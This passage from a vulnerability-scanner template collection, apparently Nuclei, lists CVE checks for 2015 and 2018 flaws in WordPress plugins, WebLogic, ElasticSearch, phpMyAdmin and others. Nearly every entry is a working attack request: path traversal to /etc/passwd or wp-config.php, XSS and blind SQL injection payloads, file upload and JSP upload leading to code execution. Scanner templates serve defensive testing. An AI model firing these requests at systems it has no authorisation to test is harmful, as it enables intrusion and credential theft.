Leakage","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}"],"headers":{"Referer":"\\x00"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Illegal character 0x0 in state"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2015-2166","info":{"name":"Ericsson Drutt MSDP - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9414","info":{"name":"WordPress Symposium <=15.8.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wp-symposium/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WP Symposium","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1880","info":{"name":"Fortinet FortiOS <=5.2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/login?&err=--%3E%3Cscript%3Ealert('{{randstr}}')%3C/script%3E%3C!--&lang=en"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('{{randstr}}')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4455","info":{"name":"WordPress Plugin Aviary Image Editor Addon For Gravity Forms 3.0 Beta - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /?gf_page=upload HTTP/1.1\nHost: {{Hostname}}\n","POST /?gf_page=upload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=a54906fe12c504cb01ca836d062f82fa\n\n--a54906fe12c504cb01ca836d062f82fa\nContent-Disposition: form-data; name=\"field_id\"\n\n3\n--a54906fe12c504cb01ca836d062f82fa\nContent-Disposition: form-data; name=\"form_id\"\n\n1\n--a54906fe12c504cb01ca836d062f82fa\nContent-Disposition: form-data; name=\"gform_unique_id\"\n\n../../../\n--a54906fe12c504cb01ca836d062f82fa\nContent-Disposition: form-data; name=\"name\"\n\n{{filename}}.phtml\n--a54906fe12c504cb01ca836d062f82fa\nContent-Disposition: form-data; name=\"file\"; filename=\"{{filename}}.jpg\"\nContent-Type: text/html\n\n{{randstr}}\n--a54906fe12c504cb01ca836d062f82fa--\n"],"matchers":[{"type":"dsl","dsl":["contains(body_1, \"Failed to upload file\")","status_code_2 == 200","contains(body_2, \"uploaded_filename\\\":\\\"{{filename}}.jpg\")"],"condition":"and"}]}]},{"id":"CVE-2015-2807","info":{"name":"Navis DocumentCloud <0.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/navis-documentcloud/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Navis","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1579","info":{"name":"WordPress Slider Revolution - Local File Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php","{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'DB_NAME'","'DB_PASSWORD'","'DB_USER'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1427","info":{"name":"ElasticSearch - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /website/blog/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\n\n{\n  \"name\": \"test\"\n}\n","POST /_search HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\n{\"size\":1, \"script_fields\": {\"lupin\":{\"lang\":\"groovy\",\"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"cat /etc/passwd\\\").getText()\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7377","info":{"name":"WordPress Pie-Register <2.0.19 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4063","info":{"name":"NewStatPress <0.9.9 - Cross-Site Scripting","severity":"low"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog=admin&pwd=admin123&wp-submit=Log+In\n","GET /wp-admin/admin.php?where1=<script>alert(document.domain)</script>&searchsubmit=Buscar&page=nsp_search HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, '<script>alert(document.domain)</script>') && contains(body_2, 'newstatpress')"],"condition":"and"}]}]},{"id":"CVE-2015-5461","info":{"name":"WordPress StageShow <5.0.9 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2015-5688","info":{"name":"Geddy <13.0.8 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-6920","info":{"name":"WordPress sourceAFRICA <=0.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/sourceafrica/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["SourceAfrica","Tags:"],"condition":"and","case-insensitive":true}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4050","info":{"name":"Symfony - Authentication Bypass","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Credits"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2067","info":{"name":"Magento Server MAGMI - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9323","info":{"name":"404 to 301 <= 2.0.2 - Authenticated Blind SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/admin.php?page=i4t3-logs&orderby=(SELECT+*+FROM+(SELECT+SLEEP(7))XXX)--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"404-to-301\")"],"condition":"and"}]}]},{"id":"CVE-2015-20067","info":{"name":"WP Attachment Export < 0.2.4 - Unrestricted File Download","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true","{{BaseURL}}/wp-admin/tools.php?content=&wp-attachment-export-download=true"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/xml\")","contains_all(body, \"title\",\"wp:author_id\",\"wp:author_email\")"],"condition":"and"}]}]},{"id":"CVE-2015-5469","info":{"name":"WordPress MDC YouTube Downloader 2.1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4074","info":{"name":"Joomla! Helpdesk Pro plugin <1.4.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5354","info":{"name":"Novius OS 5.0.1-elche - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-2996","info":{"name":"SysAid Help Desk <15.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd","{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9312","info":{"name":"NewStatPress <=1.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?groupby1=checked%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29&page=nsp_search&newstatpress_action=search HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<img src=x onerror=alert(document.domain)\")","contains(body_2, \"newstatpress\")"],"condition":"and"}]}]},{"id":"CVE-2015-1503","info":{"name":"IceWarp Mail Server <11.1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd","{{BaseURL}}/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4127","info":{"name":"WordPress Church Admin <0.810 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/church-admin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Church Admin ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-8399","info":{"name":"Atlassian Confluence <5.8.17 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/spaces/viewdefaultdecorator.action?decoratorName"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["confluence-init.properties","View Default Decorator"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9118","info":{"name":"WordPress 99 Robots WP Background Takeover Advertisements <=4.1.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_HOST","The base configurations of the WordPress"],"condition":"and"}]}]},{"id":"CVE-2018-16133","info":{"name":"Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET \\..\\..\\..\\..\\Windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-7653","info":{"name":"YzmCMS v3.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?m=search&c=index&a=initxqb4n<img%20src%3da%20onerror%3dalert(document.domain)>cu9rs&modelid=1&q=tes"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert(document.domain)>","YzmCMS"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10230","info":{"name":"Zend Server <9.13 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","is not allowed to open debug sessions"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15535","info":{"name":"Responsive FileManager <9.13.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8727","info":{"name":"Mirasys DVMS Workstation <=5.12.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-9161","info":{"name":"PrismaWEB - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/user/scripts/login_par.js"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["txtChkUser","txtChkPassword"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-3714","info":{"name":"node-srv - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/node_modules/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19914","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/dns.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_dns1=abc&new_ip1=&new_dns2=abc&new_ip2=&new_dns3=abc&new_ip3=&new_dns4=&new_ip4=&new_dns5=&new_ip5=&new_dns6=&new_ip6=&new_dns7=&new_ip7=&new_dns8=&new_ip8=&new_dns9=&new_ip9=&new_dns10=&new_ip10=&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E\n","GET /assets/dns.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-11784","info":{"name":"Apache Tomcat - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//interact.sh"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","negative":true,"status":[404]}]}]},{"id":"CVE-2018-1000129","info":{"name":"Jolokia 1.3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html","{{BaseURL}}/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg onload=alert(document.domain)>","java.lang.IllegalArgumentException","No type with name"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19753","info":{"name":"Tarantella Enterprise <3.11 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11227","info":{"name":"Monstra CMS <=3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?id=pages HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin=\"><svg/onload=alert(document.domain)>&password=xxxxxx&login_submit=Log+In\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(document.domain)>","Monstra"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-3810","info":{"name":"Oturia WordPress Smart Google Code Inserter <3.5 - Authentication Bypass","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/options-general.php?page=smartcode"],"body":"sgcgoogleanalytic=<script>console.log(\"document.domain\")</script>&sgcwebtools=&button=Save+Changes&action=savegooglecode","headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<script>console.log(\"document.domain\")</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14474","info":{"name":"Orange Forum 1.4.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?next=http://interact.sh/?app.scan/","{{BaseURL}}/signup?next=http://interact.sh/?app.scan/"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-10956","info":{"name":"IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5316","info":{"name":"WordPress SagePay Server Gateway for WooCommerce <1.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=</script>\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script>\"><script>alert(document.domain)</script>","Authenticate your card"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16283","info":{"name":"WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-8006","info":{"name":"Apache ActiveMQ <=5.15.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"><script>alert(\"1\")</script>"]},{"type":"word","part":"header","words":["/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7282","info":{"name":"TITool PrintMonitor - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}')+OR+4191=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(50000000/2))))--+vDwl&password={{password}}&language=en\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"PrintMonitor\") && contains(header, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2018-7251","info":{"name":"Anchor CMS 0.12.3 - Error Log Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/anchor/errors.log"],"matchers":[{"type":"word","words":["\"date\":","\"message\":","\"trace\":["],"condition":"and"}]}]},{"id":"CVE-2018-13980","info":{"name":"Zeta Producer Desktop CMS <14.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5230","info":{"name":"Atlassian Jira Confluence - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<iframe src=\"javascript:alert(document.domain)\">","confluence"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19386","info":{"name":"SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f"],"matchers-condition":"and","matchers":[{"type":"word","words":["<a href=\"javascript:alert(document.domain)//"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12613","info":{"name":"PhpMyAdmin <4.8.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11709","info":{"name":"WordPress wpForo Forum <= 1.4.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12909","info":{"name":"Webgrind <= 1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?op=fileviewer&file=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","webgrind"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18775","info":{"name":"Microstrategy Web 7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(/{{randstr}}/);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-0296","info":{"name":"Cisco ASA - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions"],"headers":{"Accept-Encoding":"deflate"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["///sessions"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-2894","info":{"name":"Oracle WebLogic Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ws_utc/resources/setting/options HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsetting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80\n","POST /ws_utc/resources/setting/keystore HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryuim0dyiDSPBPu31g\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_name\"\n\n{{randstr}}\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_edit_mode\"\n\nfalse\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password_front\"\n\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password\"\n\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password_changed\"\n\nfalse\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_filename\"; filename=\"{{randstr}}.jsp\"\nContent-Type: application/octet-stream\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n\n<%\nString cve = \"CVE-2018-2894\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  //0x03 is equal to 0x3, but we need 0x03 for our md5sum\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\n\nout.println(hashedpasswd.toString());\n%>\n------WebKitFormBoundaryuim0dyiDSPBPu31g--\n","GET /ws_utc/css/config/keystore/{{id}}_{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","words":["26ec00a3a03f6bfc5226fd121567bb58"]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["<keyStoreItem><id>([0-9]+)</id><name>{{randstr}}"],"internal":true}]}]},{"id":"CVE-2018-14912","info":{"name":"cgit < 1.2.1 - Directory 